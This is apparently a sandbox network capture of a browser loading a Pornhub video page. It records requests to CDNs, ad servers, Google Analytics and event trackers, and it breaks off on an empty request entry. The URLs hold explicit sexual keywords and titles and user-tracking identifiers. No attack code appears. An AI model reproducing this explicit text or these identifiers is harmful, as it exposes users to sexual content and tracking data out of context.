HTTP Request

GET https://ei.phncdn.com/www-static/js/widgets-rating-like-fav.js?cache=2024100303

HTTP Request

GET https://ei.phncdn.com/www-static/js/widgets-comments.js?cache=2024100303

HTTP Request

GET https://ei.phncdn.com/www-static/js/widgets-pornstar.js?cache=2024100303

HTTP Request

GET https://ei.phncdn.com/www-static/js/htmlPauseRoll/pb_block.js?cache=2024100303

HTTP Request

GET https://ei.phncdn.com/www-static/js/suggest-translation.js?cache=2024100303

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
66.254.114.156:443

https://cdn1-smallimg.phncdn.com/n172nWs1UEcnquuObA5x52osw51230gH/rta-1.gif

tls, http2

msedge.exe

1.7kB
6.8kB
13
17

HTTP Request

GET https://cdn1-smallimg.phncdn.com/n172nWs1UEcnquuObA5x52osw51230gH/rta-1.gif

HTTP Response

200
64.210.156.16:443

https://media.trafficjunky.net/delivery/js/abp/js1.js

tls, http2

msedge.exe

1.5kB
5.1kB
10
13

HTTP Request

GET https://media.trafficjunky.net/delivery/js/abp/js1.js

HTTP Response

200
104.21.56.52:443

https://prvc.io/api/init-4039n5u7thbwcvx8fran.js

tls, http2

msedge.exe

2.8kB
12.3kB
39
44

HTTP Request

GET https://prvc.io/api/init-4039n5u7thbwcvx8fran.js

HTTP Response

200
64.210.156.21:443

https://ei.phncdn.com/www-static/fonts/ph-icons/ph-icons.woff2?cache=2024100303

tls, http2

msedge.exe

2.2kB
37.0kB
22
37

HTTP Request

GET https://ei.phncdn.com/www-static/fonts/ph-icons/ph-icons.woff2?cache=2024100303

HTTP Response

200
66.254.114.171:443

https://a.adtng.com/get/10000098?&adtool_keyword=anal%2Canal%20sex%2Cbarbie%20sins%2Cbig%20boobs%2Cbig%20cock%2Cbig%20dick%2Cbig%20fake%20tits%2Cbig%20tits%2Cblonde%2Cblonde%20babe%2Cblowjob%2Cbritish%2Ccar%20fuck%2Ccum%20in%20ass%2Cfakedrivingschool%2Chard%20anal%20sex%2Chardcore%2Chd%20porn%2Cin%20the%20ass%2Cpornstar%2Creality%2Criding%20dick%2Cryan%20ryder%2Csucking%20dick&uuid=1627d42a515146059e9355b5da64c021&impid=1627d42a515146059e9355b5da64c021-1&tj_zid=5&tj_cid=1007935951&tj_aid=2071998131&infos=CiRkODY0NGVlZC1jOGI3LTQwZTMtOWQ2NS1kYTQ1MGU5NzY4NDcQgceFuAYaIjE2MjdkNDJhNTE1MTQ2MDU5ZTkzNTViNWRhNjRjMDIxLTEgAjAFOAVAq5EXSM/Dz+ADUgEyWNXrqd4DYJG7tYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EB8WjjiLX45D6SAQJOTKoB9AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGhkIHBvcm4saW4gdGhlIGFzcyxwb3Juc3RhcixyZWFsaXR5LHJpZGluZyBkaWNrLHJ5YW4gcnlkZXIsc3Vja2luZyBkaWNrygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzI5N4gCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCs92A3AfgAt/Qsp8E+gIBMYIDjgF7ImFjdG9yX2lkIjo1NzAwNjYxLCJjb250ZW50X3R5cGUiOiJwYXJ0bmVyIiwidmlkZW9faWQiOjQ1NzgwOTA5MSwiaGFzaCI6ImM2OTk2MzI4NWY5ZjRmZDg1MTdiNDhjOWIzZjg3MTI3Iiwic2Vzc2lvbl9pZCI6IjQxODg5MDc0MzkwMTY5NjAyMCJ9kgMHZGVza3RvcJoDAmVuqAMBwgMFdmlkZW+SBBBBeWxvIFByZW1pdW0gTHRkqAQBsgQCAwHYBDc=&noc=0

tls, http2

msedge.exe

7.6kB
37.8kB
31
45

HTTP Request

GET https://a.adtng.com/get/10000098?&uuid=2397afdf1fbe4bacb44e08e0f9d1e5da&impid=2397afdf1fbe4bacb44e08e0f9d1e5da-1&tj_zid=5&tj_cid=1007935961&tj_aid=2071998101&infos=CiQxNDczZDhiNC0xMWE4LTRjY2ItOGQ1YS1kMzVkMzc0NThmMGEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTEgAjAFOAVAtZEXSNnDz+ADUgEyWNXrqd4DYIe7tYMEgQHxaOOItfjkPpIBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCld2A3AfgAunQsp8E+gIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw==&noc=1&not=1

HTTP Request

GET https://a.adtng.com/get/10010117?&uuid=2397afdf1fbe4bacb44e08e0f9d1e5da&impid=2397afdf1fbe4bacb44e08e0f9d1e5da-2&tj_zid=2184351&tj_cid=1006144531&tj_aid=1514215301&infos=CiQzYjA3NjFlNC1jOTk2LTQ0NjUtODlhMi00NTI5MjRkMTkwZWEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTIgAjCfqYUBOJ+phQFA/fgESJOY4t8DUgEyWNXrqd4DYKu0yvIDgQGL4H8r2bEhP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCha+E0gXgAref55UE+gIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw==&noc=1&not=1

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://a.adtng.com/track/adviews/eyJleHRfemlkIjoiMjE4NDM1MSIsImV4dF9jIjoiIiwiZXh0X2FpZCI6IjE1MTQyMTUzMDEiLCJwaWQiOiI0OSIsInNpZCI6IjEwMDEwMTE3IiwibmlkcyI6IjUzOTg4IiwiZHluX2RtbiI6IiIsImNyaWQiOiIxMTE3MDEwIiwic3YiOiIyNjMyNCIsInJlZl9kbW4iOiJ3d3cucG9ybmh1Yi5jb20iLCJleHRfY2lkIjoiMTAwNjE0NDUzMSIsInRzbmFtZSI6Ik1CIiwiY3JjIjoiMTEiLCJjbiI6IjMwMFgyNTBfVElFUl8xLjAiLCJuaWQiOiI1Mzk4OCIsImV4dF9wdWIiOiIiLCJjcnAiOiIyMS40MSIsInRpZCI6IjEiLCJpdCI6IjA1XC9PY3RcLzIwMjQ6MTY6MDQ6MDIgKzAwMDAiLCJjYyI6IjQiLCJzbmNpZCI6IjEwNzE4NCIsImNpZCI6IjM5MDEwIiwiZXh0X3VpZCI6IiIsImNwIjoiNzYuOTIiLCJzbmNjaWQiOiIyNDU5NzgyIiwiaWlkIjoiMDRhZjMxNDcwNGUwYTgzNTc4MmQzMjYxMGRhNjg0Y2MiLCJleHRfaWlkIjoiIn0=?unique_view=1

HTTP Response

200

HTTP Request

GET https://a.adtng.com/track/adviews/eyJleHRfemlkIjoiMjE4NDM1MSIsImV4dF9jIjoiIiwiZXh0X2FpZCI6IjE1MTQyMTUzMDEiLCJwaWQiOiI0OSIsInNpZCI6IjEwMDEwMTE3IiwibmlkcyI6IjUzOTg4IiwiZHluX2RtbiI6IiIsImNyaWQiOiIxMTE3MDEwIiwic3YiOiIyNjMyNCIsInJlZl9kbW4iOiJ3d3cucG9ybmh1Yi5jb20iLCJleHRfY2lkIjoiMTAwNjE0NDUzMSIsInRzbmFtZSI6Ik1CIiwiY3JjIjoiMTEiLCJjbiI6IjMwMFgyNTBfVElFUl8xLjAiLCJuaWQiOiI1Mzk4OCIsImV4dF9wdWIiOiIiLCJjcnAiOiIyMS40MSIsInRpZCI6IjEiLCJpdCI6IjA1XC9PY3RcLzIwMjQ6MTY6MDQ6MDIgKzAwMDAiLCJjYyI6IjQiLCJzbmNpZCI6IjEwNzE4NCIsImNpZCI6IjM5MDEwIiwiZXh0X3VpZCI6IiIsImNwIjoiNzYuOTIiLCJzbmNjaWQiOiIyNDU5NzgyIiwiaWlkIjoiMDRhZjMxNDcwNGUwYTgzNTc4MmQzMjYxMGRhNjg0Y2MiLCJleHRfaWlkIjoiIn0=?unique_view=0

HTTP Response

200

HTTP Request

GET https://a.adtng.com/get/10000098?&adtool_keyword=anal%2Canal%20sex%2Cbarbie%20sins%2Cbig%20boobs%2Cbig%20cock%2Cbig%20dick%2Cbig%20fake%20tits%2Cbig%20tits%2Cblonde%2Cblonde%20babe%2Cblowjob%2Cbritish%2Ccar%20fuck%2Ccum%20in%20ass%2Cfakedrivingschool%2Chard%20anal%20sex%2Chardcore%2Chd%20porn%2Cin%20the%20ass%2Cpornstar%2Creality%2Criding%20dick%2Cryan%20ryder%2Csucking%20dick&uuid=1627d42a515146059e9355b5da64c021&impid=1627d42a515146059e9355b5da64c021-1&tj_zid=5&tj_cid=1007935951&tj_aid=2071998131&infos=CiRkODY0NGVlZC1jOGI3LTQwZTMtOWQ2NS1kYTQ1MGU5NzY4NDcQgceFuAYaIjE2MjdkNDJhNTE1MTQ2MDU5ZTkzNTViNWRhNjRjMDIxLTEgAjAFOAVAq5EXSM/Dz+ADUgEyWNXrqd4DYJG7tYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EB8WjjiLX45D6SAQJOTKoB9AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGhkIHBvcm4saW4gdGhlIGFzcyxwb3Juc3RhcixyZWFsaXR5LHJpZGluZyBkaWNrLHJ5YW4gcnlkZXIsc3Vja2luZyBkaWNrygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzI5N4gCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCs92A3AfgAt/Qsp8E+gIBMYIDjgF7ImFjdG9yX2lkIjo1NzAwNjYxLCJjb250ZW50X3R5cGUiOiJwYXJ0bmVyIiwidmlkZW9faWQiOjQ1NzgwOTA5MSwiaGFzaCI6ImM2OTk2MzI4NWY5ZjRmZDg1MTdiNDhjOWIzZjg3MTI3Iiwic2Vzc2lvbl9pZCI6IjQxODg5MDc0MzkwMTY5NjAyMCJ9kgMHZGVza3RvcJoDAmVuqAMBwgMFdmlkZW+SBBBBeWxvIFByZW1pdW0gTHRkqAQBsgQCAwHYBDc=&noc=0

HTTP Response

200
66.254.114.171:443

a.adtng.com

tls

msedge.exe

1.7kB
1.7kB
5
5
64.210.156.4:443

https://hw-cdn2.adtng.com/a7/creatives/221/1559/820086/1115660/1115660_video.mp4

tls, http2

msedge.exe

12.2kB
554.1kB
216
418

HTTP Request

GET https://hw-cdn2.adtng.com/a7/creatives/221/1559/820086/1115660/1115660_logo.png

HTTP Response

200

HTTP Request

GET https://hw-cdn2.adtng.com/delivery/intersection_observer/IntersectionObserver.js

HTTP Request

GET https://hw-cdn2.adtng.com/a7/creatives/221/1559/820086/1115660/1115660_video.mp4

HTTP Response

200

HTTP Response

206
64.210.156.21:443

https://ht-cdn2.adtng.com/a7/creatives/1/49/820339/1117010/1117010_video.mp4

tls, http2

msedge.exe

14.5kB
708.2kB
265
507

HTTP Request

GET https://ht-cdn2.adtng.com/delivery/vortex/vortex-simple-1.0.0.js

HTTP Request

GET https://ht-cdn2.adtng.com/a7/creatives/1/49/820339/1117010/1117010_logo.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://ht-cdn2.adtng.com/a7/creatives/1/49/820339/1117010/1117010_video.mp4

HTTP Response

206
64.210.156.21:443

ht-cdn2.adtng.com

tls

msedge.exe

1.9kB
3.9kB
7
8
142.250.179.251:443

https://storage.googleapis.com/workbox-cdn/releases/5.1.3/workbox-sw.js

tls, http2

msedge.exe

2.2kB
8.0kB
26
30

HTTP Request

GET https://storage.googleapis.com/workbox-cdn/releases/5.1.3/workbox-sw.js
142.250.200.14:443

https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144256638&_gaz=1&gcs=G111&gcd=13t3t3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=2&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2Fview_video.php%3Fviewkey%3D66e6fe092a6e2&dr=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20Fuck%20my%20ASS%20-%20Pornhub.com&en=user_engagement&ep.active=active&ep.hd_video=Yes&ep.language_spoken_in_video=English&ep.mpp_geo_blocked=Allowed&ep.paid_uviu_video=No&ep.pornstars_in_video=Ryan%20Ryder%2CBarbie%20Sins&ep.premium_thumbs=Yes&ep.premium_video=No&ep.up_id=5700661&ep.video_date_pubslihed=20240918&ep.video_duration=15&ep.video_geo_japan=No&ep.video_orientation=Straight&ep.video_player_version=8.1.0&ep.video_production=Professional&ep.video_reactivated=No&ep.video_segment=Straight&ep.video_uploader=Content%20Partner&ep.video_uploader_name=FakeHub&ep.dd_related_videos=pornhub.related_video.89&ep.dd_recommended_videos=No&ep.login_user=No&ep.user_interface=pc&ep.content_group=videos&ep.content_group_2=video&ep.referrer_group=homepage&ep.ms_translations=en_none&ep.seo_tags_translation=0&_et=28100&tfd=56067

tls, http2

msedge.exe

6.6kB
10.9kB
40
48

HTTP Request

POST https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144239999&_gaz=1&gcs=G111&gcd=13r3r3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=3&sid=1728144241&sct=1&seg=0&dl=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=user_engagement&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&ep.ga_temp_client_id=1100938586.1728144242&_et=4&tfd=6772

HTTP Request

POST https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144239999&gcs=G111&gcd=13r3r3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=4&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=user_engagement&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&_et=10989&tfd=17990

HTTP Request

POST https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053z8892446692za200zb892446692&_p=1728144256638&gcs=G111&gcd=13t3t3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=1&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2Fview_video.php%3Fviewkey%3D66e6fe092a6e2&dr=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20Fuck%20my%20ASS%20-%20Pornhub.com&en=page_view&ep.active=active&ep.hd_video=Yes&ep.language_spoken_in_video=English&ep.mpp_geo_blocked=Allowed&ep.paid_uviu_video=No&ep.pornstars_in_video=Ryan%20Ryder%2CBarbie%20Sins&ep.premium_thumbs=Yes&ep.premium_video=No&ep.up_id=5700661&ep.video_date_pubslihed=20240918&ep.video_duration=15&ep.video_geo_japan=No&ep.video_orientation=Straight&ep.video_player_version=8.1.0&ep.video_production=Professional&ep.video_reactivated=No&ep.video_segment=Straight&ep.video_uploader=Content%20Partner&ep.video_uploader_name=FakeHub&ep.dd_related_videos=pornhub.related_video.89&ep.dd_recommended_videos=No&ep.login_user=No&ep.user_interface=pc&ep.content_group=videos&ep.content_group_2=video&ep.referrer_group=homepage&ep.ms_translations=en_none&ep.seo_tags_translation=0&up.login_user=No&up.user_interface=pc&up.signup_experiment_value=all&up.orientation=straight&up.shorties_experiment_version=phase_1&up.shorties_exp_2=B&up.isp=Surf&up.connection_type=Corporate&up.seo_tags_translation_user=0&tfd=6120

HTTP Request

POST https://analytics.google.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je4a20v889308053za200zb892446692&_p=1728144256638&_gaz=1&gcs=G111&gcd=13t3t3l3l5l1&npa=0&dma=0&tag_exp=101671035~101747727~101794736&cid=1100938586.1728144242&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=noapi&_s=2&sid=1728144241&sct=1&seg=1&dl=https%3A%2F%2Fwww.pornhub.com%2Fview_video.php%3Fviewkey%3D66e6fe092a6e2&dr=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&dt=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20Fuck%20my%20ASS%20-%20Pornhub.com&en=user_engagement&ep.active=active&ep.hd_video=Yes&ep.language_spoken_in_video=English&ep.mpp_geo_blocked=Allowed&ep.paid_uviu_video=No&ep.pornstars_in_video=Ryan%20Ryder%2CBarbie%20Sins&ep.premium_thumbs=Yes&ep.premium_video=No&ep.up_id=5700661&ep.video_date_pubslihed=20240918&ep.video_duration=15&ep.video_geo_japan=No&ep.video_orientation=Straight&ep.video_player_version=8.1.0&ep.video_production=Professional&ep.video_reactivated=No&ep.video_segment=Straight&ep.video_uploader=Content%20Partner&ep.video_uploader_name=FakeHub&ep.dd_related_videos=pornhub.related_video.89&ep.dd_recommended_videos=No&ep.login_user=No&ep.user_interface=pc&ep.content_group=videos&ep.content_group_2=video&ep.referrer_group=homepage&ep.ms_translations=en_none&ep.seo_tags_translation=0&_et=28100&tfd=56067
64.233.166.155:443

https://stats.g.doubleclick.net/g/collect?v=2&tid=G-B39RFFWGYY&cid=1100938586.1728144242&gtm=45je4a20v889308053za200zb892446692&aip=1&dma=0&gcs=G111&gcd=13r3r3l3l5l1&npa=0&frm=0&tag_exp=101671035~101747727~101794736

tls, http2

msedge.exe

2.5kB
7.5kB
27
31

HTTP Request

POST https://stats.g.doubleclick.net/g/collect?v=2&tid=G-B39RFFWGYY&cid=1100938586.1728144242&gtm=45je4a20v889308053za200zb892446692&aip=1&dma=0&gcs=G111&gcd=13r3r3l3l5l1&npa=0&frm=0&tag_exp=101671035~101747727~101794736
64.210.156.19:443

static.trafficjunky.com

tls

msedge.exe

1.1kB
4.7kB
11
12
18.172.88.11:443

https://track.thuis.nl/b2b6dee2-f71a-46f0-83a8-1a6c621fe26d?CampaignID=1006851051&SpotName=Pornhub%20PC-%20Popunder&BLPName=&SiteName=Pornhub

tls, http2

msedge.exe

2.5kB
7.8kB
27
30

HTTP Request

GET https://track.thuis.nl/b2b6dee2-f71a-46f0-83a8-1a6c621fe26d?CampaignID=1006851051&SpotName=Pornhub%20PC-%20Popunder&BLPName=&SiteName=Pornhub

HTTP Response

302
64.210.156.19:443

https://static.trafficjunky.com/invocation/idsync/production/idsync.min.js?v=1728086400000

tls, http2

msedge.exe

1.9kB
23.4kB
16
26

HTTP Request

GET https://static.trafficjunky.com/invocation/idsync/production/idsync.min.js?v=1728086400000

HTTP Response

200
93.184.223.43:443

https://eg-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

tls, http2

msedge.exe

7.2kB
706.8kB
119
532

HTTP Request

GET https://eg-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

HTTP Response

206

HTTP Request

GET https://eg-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

HTTP Response

206
66.254.114.62:443

https://etahub.com/events?app_id=10896&bfeatureValue=false&eventName=chromecast&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=chromecast&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

tls, http2

msedge.exe

9.2kB
9.2kB
40
42

HTTP Request

GET https://etahub.com/events?app_id=10896&eventName=adroll_response&nosVersion=10&nstartPoint=0&nvd=900&nvid=457809091&nvt=1728144256&scampaignId=953201802&sfeatureName=adroll_response&sfeatureValue=campaign&sformat=json&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10896&eventName=playerLoaded&ndate=1728144259187&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&scdnHostname=haproxy&sfeatureName=playerLoaded&sfeatureValue=desktop&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&svideoTitle=Fake%20Driving%20School%20-%20Test%20my%20TITS%20and%20then%20fuck%20my%20ASS&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Request

GET https://etahub.com/events?app_id=10829&splayer=&eventName=play&ssite=https%3A%2F%2Ftrack.thuis.nl%2Fa46ebf7f-8278-4f2b-9b07-d651d9143af4%3FCampaignID%3D1010869731%26SpotName%3DPornhub%2BPC%2B-%2BPreroll%26BLPName%3D%7BBLPName%7D%26SiteName%3DPornhub&scampaign=TJ%20Campaign&ssiteName=pornhub&splatform=PC&sadTitle=TJDelivery&ntimeout_tier=1&nstartPoint=0

HTTP Request

GET https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=start&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=firstQuartile&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=midpoint&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=thirdQuartile&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=pause&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Request

GET https://etahub.com/events?app_id=10896&eventName=adroll_tracking&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=adroll_tracking&sfeatureValue=complete&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Response

200

HTTP Request

